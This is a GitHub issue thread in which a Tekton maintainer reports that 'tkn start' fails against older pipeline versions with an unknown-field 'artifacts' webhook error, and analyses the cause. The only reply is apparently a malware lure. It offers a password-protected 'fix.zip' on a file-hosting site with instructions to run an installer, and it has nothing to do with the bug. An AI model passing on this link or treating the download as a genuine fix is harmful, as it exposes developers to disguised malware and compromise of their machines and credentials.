### ISSUE TITLE
Failing to to `tkn start` with recent `tkn` release and old(er) pipeline version

### ISSUE THREAD

**Issue by vdemeester** [tektoncd/cli#2388]
`tkn` version is 0.38, `pipeline` version is 0.61.x (so, relatively recent). This would also happen with the older LTS, such as 0.59.x, …

# Expected Behavior

`tkn start` working and starting the task.

# Actual Behavior

`tkn start` fails with the following.

```
Error: admission webhook "webhook.pipeline.tekton.dev" denied the request: mutation failed: cannot decode incoming new object: json: unknown field "artifacts"
```

# Steps to Reproduce the Problem

0. Install pipelnie v0.61.x or older and `tkn` 0.38
1. Define a `Task`
2. Do a `tkn start` …
3.

# Additional Info

This boils down to the definition in `pipeline`, see https://github.com/tektoncd/pipeline/blob/main/pkg/apis/pipeline/v1/taskrun_types.go#L300L303. When it gets created by `tkn`, it most likely is an empty arrays instead of being `nil`, and… it is not recognized on older version of `tektoncd/pipeline`.

This could be a "backward" incompatibility from `tektoncd/pipeline`.
cc @tektoncd/cli-maintainers @tektoncd/core-maintainers

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
